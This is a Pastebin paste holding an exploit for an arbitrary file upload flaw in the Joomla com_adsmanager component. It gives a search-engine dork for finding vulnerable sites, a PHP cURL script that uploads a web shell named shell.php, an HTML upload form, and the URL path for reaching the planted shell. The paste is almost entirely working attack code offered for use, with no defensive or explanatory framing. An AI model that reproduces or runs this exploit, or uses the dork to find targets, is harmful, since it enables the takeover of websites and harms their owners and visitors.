Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org
- CODE PHP :
- <?php
- $url = "site.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
- $post = array
- (
- "file" => "@shell.jpg",
- "name" => "shell.php"
- );
- $ch = curl_init ("$url");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- $data = curl_exec ($ch);
- curl_close ($ch);
- echo $data;
- ?>
- #CSRF :
- <form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"
- enctype="multipart/form-data">
- <input type="file" name="files[]" /><button>Upload</button>
- </form>
- Acces Shell: site.com/tmp/plupload/shell.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement